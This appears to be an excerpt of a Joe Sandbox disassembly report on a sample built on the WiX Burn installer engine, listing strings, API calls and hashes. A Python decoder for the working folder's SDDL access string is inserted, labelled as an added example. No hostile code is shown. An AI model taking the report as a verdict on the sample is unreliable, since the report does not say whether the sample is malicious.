• String ID: -%ls$ -%ls=%ls$ -%ls=ALL$ -norestart$"%ls"$$yG$%hs is null.$%ls %ls$Failed to allocate base command.$Failed to allocate obfuscated exe command.$Failed to append %ls$Failed to append argument from ARP.$Failed to append norestart argument.$Failed to append the custom working directory to the exepackage command line.$Failed to append the list of ancestors to the command line.$Failed to append the list of dependencies to ignore to the command line.$Failed to append the relation type to the command line.$Failed to build executable path.$Failed to copy executable path.$Failed to copy package arguments.$Failed to evaluate executable package command-line condition.$Failed to format argument string.$Failed to format obfuscated argument string.$Failed to get cached path for package: %ls$Failed to get command-line argument for install.$Failed to get command-line argument for repair.$Failed to get command-line argument for uninstall.$Failed to get parent directory for QuietUninstallString executable path: %ls$Failed to get parent directory for pseudo-package: %ls$Failed to parse QuietUninstallString: %ls.$Failed to query ArpEntry for %hs.$Failed to run EXE process$Failed to run exe with Burn protocol from path: %ls$Failed to run netfx chainer: %ls$Failed to separate command-line arguments.$Failed to verify the QuietUninstallString executable path is in a secure location: %ls$Invalid Exe package action: %d.$Process returned error: 0x%x$Pseudo ExePackages must have a fully qualified target path.$QuietUninstallString$QuietUninstallString must contain an executable path.$The QuietUninstallString executable path is not in a secure location: %ls$UninstallString$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$burn.ancestors$burn.filehandle.self$burn.ignoredependencies$burn.related.chain.package$d:\a\wix\wix\src\burn\engine\exeengine.cpp$install$uninstall
• API String ID: 2962429428-3240411882
• Opcode ID: ea665492716833f1256a29a298ee56cab184abea51e99a4d970bb6ffa3eeb319
• Instruction ID: 1aa1d199bc1b9ee4905d7ef44b542dc34a19831184c003684ebd1e762046cbc5
• Opcode Fuzzy Hash: ea665492716833f1256a29a298ee56cab184abea51e99a4d970bb6ffa3eeb319
• Instruction Fuzzy Hash: 2252E331E40215BBDF229E94DC4AFEF7A78AB08714F10016BFA04BA1D1D7B99D50CB99
APIs
  • Part of subcall function 0046B18E: VariantInit.OLEAUT32(?), ref: 0046B1A5
  • Part of subcall function 0046B18E: VariantClear.OLEAUT32(?), ref: 0046B2F0
  • Part of subcall function 0046B18E: SysFreeString.OLEAUT32(00000000), ref: 0046B2FB
• CompareStringW.KERNEL32(0000007F,00000000,?,00000000,condition,00000000,?,DetectionType,?,00000000,?,00000000,00000002,?,00415AED,00000000), ref: 0043E2FC
• CompareStringW.KERNEL32(0000007F,00000000,?,00000000,arp,00000000,?,00415AED,00000000,?), ref: 0043E3FC
  • Part of subcall function 0046B18E: SysAllocString.OLEAUT32(?), ref: 0046B1DF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: String$CompareVariant$AllocClearFreeInit
• String ID: ArpDisplayVersion$ArpId$ArpUseUninstallString$ArpWin64$Bundle$DetectCondition$DetectionType$Failed to build full key path.$Failed to get @ArpDisplayVersion.$Failed to get @ArpId.$Failed to get @ArpWin64.$Failed to get @Bundle.$Failed to get @DetectCondition.$Failed to get @DetectionType.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to get @Uninstallable.$Failed to parse @ArpDisplayVersion: %ls$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid detection type: %ls$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallArguments$Uninstallable$arp$burn$condition$d:\a\wix\wix\src\burn\engine\exeengine.cpp$netfx4$none
• API String ID: 702752599-2963074696
• Opcode ID: 2854a7e512559dd9f899eb55f697986bf7501162157cfd9d1b32d10ad1a6f097
• Instruction ID: 1173f121790aee6c23e6d131af1fb81c3b3eb900601b3ad4c8e95901c37c6fa5
• Opcode Fuzzy Hash: 2854a7e512559dd9f899eb55f697986bf7501162157cfd9d1b32d10ad1a6f097
• Instruction Fuzzy Hash: 37F11B32F82331B6DA2161564C4AFEB5D0D9B0AB64F21113BFE18BB2C1DAAC5C4142ED
APIs
• InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00468A67
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468A71
• CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00468AC9
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468AD3
• CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00468B21
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468B2B
• CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 00468B7C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468B86
• CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 00468BD7
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468BE1
• CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 00468C32
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468C3C
• SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00468D3E
• SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00468D89
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468D93
• SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00468DDC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468DE6
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00468E30
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468E3A
• CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00468E89
• LocalFree.KERNEL32(00000000), ref: 00468EC0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
• String ID: Failed to create ACL for system restore.$Failed to create administrator SID for system restore.$Failed to create local service SID for system restore.$Failed to create local system SID for system restore.$Failed to create network service SID for system restore.$Failed to create self SID for system restore.$Failed to initialize COM security for system restore.$Failed to initialize security descriptor for system restore.$Failed to set DACL for system restore.$Failed to set administrators group access for system restore.$Failed to set administrators owner for system restore.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\srputil.cpp
• API String ID: 267631441-1863884823
• Opcode ID: a83ea16b75d0a90d4f99b95c96d27489610f7f2ebd63591f31821bb13ac54a6f
• Instruction ID: f2d4cb9a0cc6cd990e3d7e5a70e46b795aad5398d4c7bb32d09ff84eda8c958c
• Opcode Fuzzy Hash: a83ea16b75d0a90d4f99b95c96d27489610f7f2ebd63591f31821bb13ac54a6f
• Instruction Fuzzy Hash: FED197B2D412286BD7309B558C44FDBB7BCAF45710F0146AFBD08F7251E6789D408EA9
APIs
• CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000040,?,?,?,?,?,?), ref: 004652E9
• GetLastError.KERNEL32(?,?), ref: 004652F3
• CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?), ref: 00465341
• GetLastError.KERNEL32(?,?), ref: 0046534B
• CryptHashData.ADVAPI32(?,?,?,00000000,?,?), ref: 004653A6
• ReadFile.KERNEL32(?,?,00001000,?,00000000,?,?), ref: 004653CA
• GetLastError.KERNEL32(?,?), ref: 004653D4
• CryptDestroyHash.ADVAPI32(00000000), ref: 00465427
• CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0046543E
• GetLastError.KERNEL32(?,?), ref: 00465457
• CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?), ref: 004654A3
• GetLastError.KERNEL32(?,?), ref: 004654AD
• SetFilePointerEx.KERNEL32(?,00000000,00000000,0000800E,00000001,?,?), ref: 004654F7
• GetLastError.KERNEL32(?,?), ref: 00465505
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
• String ID: Failed to acquire crypto context.$Failed to get file pointer.$Failed to get hash value.$Failed to hash data block.$Failed to initiate hash.$Failed to read data block.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
• API String ID: 3955742341-402640524
• Opcode ID: 0a9babcff287eae9071b8e832a49570a0b123d5f9e3e684f4e02b04fafd1c5f7
• Instruction ID: 74c4a3cc03c5b4668d94b1cde80fa60ecf408fb510d0cc46fc5e8e0ed1095277
• Opcode Fuzzy Hash: 0a9babcff287eae9071b8e832a49570a0b123d5f9e3e684f4e02b04fafd1c5f7
• Instruction Fuzzy Hash: 6561F932E40635ABD7319B548D44BAB7668AB04B51F0240B7BD48F7291F7BC8CC19BAD
APIs
• EnterCriticalSection.KERNEL32(004B2588,00000000,?,--- logging level: %hs ---,004A6594,00000000,?,004092BB,00000003), ref: 004657E7
• GetCurrentProcessId.KERNEL32(00000000,?,004092BB,00000003), ref: 004657F7
• GetCurrentThreadId.KERNEL32 ref: 00465800
• GetLocalTime.KERNEL32(004092BB,?,004092BB,00000003), ref: 00465816
• LeaveCriticalSection.KERNEL32(004B2588,?,?,?,00000000,0000FDE9,?,004092BB,00000003), ref: 0046597F
Strings
• 8iJ, xrefs: 00465846
• %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 004658B3
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp, xrefs: 004658D7, 0046596D
• $yG, xrefs: 00465881
• 4iJ, xrefs: 0046584D
• <iJ, xrefs: 00465863
• $yG, xrefs: 00465872
• Failed to write string to log using redirected function: %ls, xrefs: 0046593E
• Failed to format line prefix., xrefs: 004658C8
• Failed to write string to log using default function: %ls, xrefs: 0046595E
• Failed to convert log string to UTF-8, xrefs: 00465909
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
• String ID: $yG$$yG$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$4iJ$8iJ$<iJ$Failed to convert log string to UTF-8$Failed to format line prefix.$Failed to write string to log using default function: %ls$Failed to write string to log using redirected function: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp
• API String ID: 296830338-3445050236
• Opcode ID: e69c3fc08d4a5b02fdc3746a51fe285598fb314001f1912c3713567206635aff
• Instruction ID: 1d492ebc065ce232b939492bbd96e30c18557709b67a3f9fc1df70e4f9ce1a4a
• Opcode Fuzzy Hash: e69c3fc08d4a5b02fdc3746a51fe285598fb314001f1912c3713567206635aff
• Instruction Fuzzy Hash: 7151E871E00615BBDB219B95CC09BBF7668EB05B15F15412BF505F72D0E27C8D40C7AA
Strings
• Failed to transfer working path to unverified path for payload: %ls., xrefs: 0041DA52
• d:\a\wix\wix\src\burn\engine\cache.cpp, xrefs: 0041D9B2, 0041DA0B, 0041DBB8, 0041DBDC
• Aborted transferring working path to unverified path for payload: %ls., xrefs: 0041DAB3
• Failed to create unverified path., xrefs: 0041D9F9
• moving, xrefs: 0041DB46, 0041DB53
• Failed to get cached path for package with cache id: %ls, xrefs: 0041D9A0
• Failed to move verified file to complete payload path: %ls, xrefs: 0041DB8B
• Failed to reset permissions on unverified cached payload: %ls, xrefs: 0041DADD
• Failed to verify payload: %ls at path: %ls, xrefs: 0041DB2B
• Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 0041DBCA
• copying, xrefs: 0041DB4D
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID:
• String ID: Aborted transferring working path to unverified path for payload: %ls.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$Failed to verify payload: %ls at path: %ls$copying$d:\a\wix\wix\src\burn\engine\cache.cpp$moving
• API String ID: 0-2372213951
• Opcode ID: fd7653b76ff77a591f7ed269d2034720c0c323c599b89018bedc9814e2ed4af8
• Instruction ID: d64e87b8fb0c6e41dc1591e6e9ecd781635d9dde9388cd0db50306fa54106ca1
• Opcode Fuzzy Hash: fd7653b76ff77a591f7ed269d2034720c0c323c599b89018bedc9814e2ed4af8
• Instruction Fuzzy Hash: E671B372A80215BBEF126E81CC46FDE3E25AF08B55F110116FB04790E0D3B9DDA0AB9D
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00466870
• GetLastError.KERNEL32 ref: 0046687A
• OpenProcessToken.ADVAPI32(?,00000020,?), ref: 004668CE
• GetLastError.KERNEL32 ref: 004668D8
• AdjustTokenPrivileges.ADVAPI32(00000000,00000000,00000001,00000010,00000000,00000000), ref: 0046692A
• GetLastError.KERNEL32 ref: 00466934
• GetLastError.KERNEL32 ref: 00466978
• CloseHandle.KERNEL32(00000000), ref: 00466991
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorLast$Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
• String ID: Failed to adjust token to add privilege: %ls$Failed to get privilege LUID: %ls$Failed to get process token to adjust privileges.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
• API String ID: 1766547789-1148688956
• Opcode ID: e8d3679d17837b06aea696018eb5b23bbd61831d79193dffcd4c2a3ce353df03
• Instruction ID: 351d14d1a3089831185c8d75256483e5362c7b203d08a8a2b94a14870c84165e
• Opcode Fuzzy Hash: e8d3679d17837b06aea696018eb5b23bbd61831d79193dffcd4c2a3ce353df03
• Instruction Fuzzy Hash: 3741D672E4123577E3206B558C49F7F7A78EB05B64F42412ABE04BB2D0E6784C448AE9
APIs
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0041CB51
• GetLastError.KERNEL32 ref: 0041CB64
• DecryptFileW.ADVAPI32(?,00000000), ref: 0041CD37
• CloseHandle.KERNEL32(?), ref: 0041CD46
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: File$CloseCreateDecryptErrorHandleLast
• String ID: Failed to open payload at path: %ls$Failed to verify file size for path: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$Payload has no verification information: %ls$d:\a\wix\wix\src\burn\engine\cache.cpp
• API String ID: 3262865546-2448136901
• Opcode ID: fa376da953a7d8ea58e8f6f82b93420acad8f4158d0ac290a6130e20e1d05929
• Instruction ID: 6cdbdf150335a00c2a66d0d625790ea5694e87eea650a63b463449f80e8de83d
• Opcode Fuzzy Hash: fa376da953a7d8ea58e8f6f82b93420acad8f4158d0ac290a6130e20e1d05929
• Instruction Fuzzy Hash: A951EB316C0616BBDB222E549C8AFEB3E25AF04B54F210126F904751D1E36D9CE0DBDD
                                                                                                                                                          APIs
                                                                                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:PAI(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY),00000001,00000001,00000000), ref: 0041DC91
                                                                                                                                                          • GetLastError.KERNEL32(0040951C,00000000,0040960C,?,00000001), ref: 0041DC9A
                                                                                                                                                          • DecryptFileW.ADVAPI32(?,00000000), ref: 0041DDA9
                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0041DDFD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: DescriptorSecurity$ConvertDecryptErrorFileFreeLastLocalString
• String ID: D:PAI(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)$Failed to copy working folder.$Failed to create the security descriptor for the working folder.$No usable base working folder found.$d:\a\wix\wix\src\burn\engine\cache.cpp$version.dll
• API String ID: 936408299-529345945
• Opcode ID: 996f1f556ca15f9e6b0dcb6549ca3c94186933c1619cfb34fc28d08cd1c2202d
• Instruction ID: a7019ded047c6914c67b8932003c3d9361b862dc46e37752ba418b532e993c74
• Opcode Fuzzy Hash: 996f1f556ca15f9e6b0dcb6549ca3c94186933c1619cfb34fc28d08cd1c2202d
• Instruction Fuzzy Hash: 1941C4B1E40215BBDB11AF64DC45FDF7AA8AF04701F10416AF904F7291E7789D80DBA8
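The `String ID` in the record above carries the SDDL descriptor that Burn applies to its working folder. The Python decoder below is an added example, not code from the Joe Sandbox report or from the WiX project: it parses that exact string into its DACL control flags and ACEs and then runs a practitioner's check, `is_admin_only` (a name chosen for this example), which passes only when the DACL is protected against inheritance and every allow ACE names Administrators or SYSTEM. The alias tables are the documented SDDL abbreviations, limited to those a file-system DACL normally uses.

```python
"""Decode a Windows SDDL DACL string such as the one Burn uses for its working folder."""
import re
from dataclasses import dataclass

# Copied verbatim from the strings shown in the cache.cpp record above.
WORKING_FOLDER_SDDL = "D:PAI(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)"

# Standard SDDL abbreviations (subset that covers ordinary file-system DACLs).
DACL_FLAGS = {"P": "PROTECTED", "AI": "AUTO_INHERITED", "AR": "AUTO_INHERIT_REQ"}
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT",
             "OA": "OBJECT_ACCESS_ALLOWED", "OD": "OBJECT_ACCESS_DENIED"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "IO": "INHERIT_ONLY",
             "NP": "NO_PROPAGATE_INHERIT", "ID": "INHERITED"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
          "GX": "GENERIC_EXECUTE", "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ",
          "FW": "FILE_GENERIC_WRITE", "FX": "FILE_GENERIC_EXECUTE", "RC": "READ_CONTROL",
          "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER"}
TRUSTEES = {"BA": "Builtin Administrators", "SY": "Local System", "BU": "Builtin Users",
            "WD": "Everyone", "AU": "Authenticated Users", "IU": "Interactive Users",
            "CO": "Creator Owner"}


@dataclass
class Ace:
    ace_type: str
    flags: list
    rights: list
    trustee: str


@dataclass
class Dacl:
    control: list
    aces: list


def _split_tokens(run, table):
    """Split a run of SDDL abbreviations, longest token first: 'OICIIO' -> OI, CI, IO."""
    out, i = [], 0
    while i < len(run):
        if run[i:i + 2] in table:
            out.append(table[run[i:i + 2]])
            i += 2
        elif run[i] in table:
            out.append(table[run[i]])
            i += 1
        else:
            raise ValueError(f"unknown SDDL token at {run[i:]!r}")
    return out


def parse_dacl(sddl):
    """Parse a DACL-only SDDL string of the form 'D:flags(ace)(ace)...' into a Dacl."""
    m = re.fullmatch(r"D:([A-Z]*)((?:\([^()]*\))*)", sddl)
    if not m:
        raise ValueError("expected a DACL-only SDDL string")
    control = _split_tokens(m.group(1), DACL_FLAGS)
    aces = []
    for body in re.findall(r"\(([^()]*)\)", m.group(2)):
        # ACE fields: type;flags;rights;object_guid;inherit_object_guid;trustee
        ace_type, flags, rights, _obj, _inh_obj, trustee = body.split(";")[:6]
        if rights.lower().startswith("0x"):
            parsed_rights = [f"MASK_{int(rights, 16):#010x}"]  # raw access mask
        else:
            parsed_rights = _split_tokens(rights, RIGHTS)
        aces.append(Ace(ACE_TYPES[ace_type], _split_tokens(flags, ACE_FLAGS),
                        parsed_rights, TRUSTEES.get(trustee, trustee)))
    return Dacl(control, aces)


def allowed_trustees(sddl):
    """Trustees that receive at least one ACCESS_ALLOWED ACE."""
    return {a.trustee for a in parse_dacl(sddl).aces if a.ace_type == "ACCESS_ALLOWED"}


def is_admin_only(sddl):
    """True only if the DACL is protected (no inheritance from the parent folder) and
    every allow ACE names Administrators or SYSTEM. An unprotected DACL is rejected on
    purpose: the parent's ACEs would be inherited and cannot be judged from the string."""
    dacl = parse_dacl(sddl)
    if "PROTECTED" not in dacl.control:
        return False
    return allowed_trustees(sddl) <= {"Builtin Administrators", "Local System"}


if __name__ == "__main__":
    for ace in parse_dacl(WORKING_FOLDER_SDDL).aces:
        print(ace)
    print("admin-only:", is_admin_only(WORKING_FOLDER_SDDL))
```

Decoded, the string says: the DACL is protected and auto-inherited; Administrators and SYSTEM each get FILE_ALL_ACCESS on the folder itself and, through an inherit-only ACE, GENERIC_ALL on everything created beneath it; no other trustee appears. Strings without the `P` flag are reported as not admin-only by design, because the parent directory's ACEs would be inherited at creation time.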

Strings
• Failed to set variant value., xrefs: 0040ADC0
• d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040ADD2
• Failed to get OS info., xrefs: 0040ACB4
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: FreeLibrary
• String ID: Failed to get OS info.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
• API String ID: 3664257935-4238978541
• Opcode ID: e978f8cb67219e56eb47f3f1b47a5da83a3b7742430d28ce65be8baaf12df44d
• Instruction ID: b4ce1e4f44928a8131f42f2c76acee55e6ac13dd8bd33c51c7519a314af31df5
• Opcode Fuzzy Hash: e978f8cb67219e56eb47f3f1b47a5da83a3b7742430d28ce65be8baaf12df44d
• Instruction Fuzzy Hash: C441E871A04318BBDB218B69CC46FEE7BB8EF49711F4044AAF505F7180D2389A91CB5A

APIs
• CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0041C9D0
• GetLastError.KERNEL32 ref: 0041C9E3
• DecryptFileW.ADVAPI32(?,00000000), ref: 0041CAE4
• CloseHandle.KERNEL32(?,?,?,?,?,00000001,?,00000000,?,?,?,?), ref: 0041CAF3
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
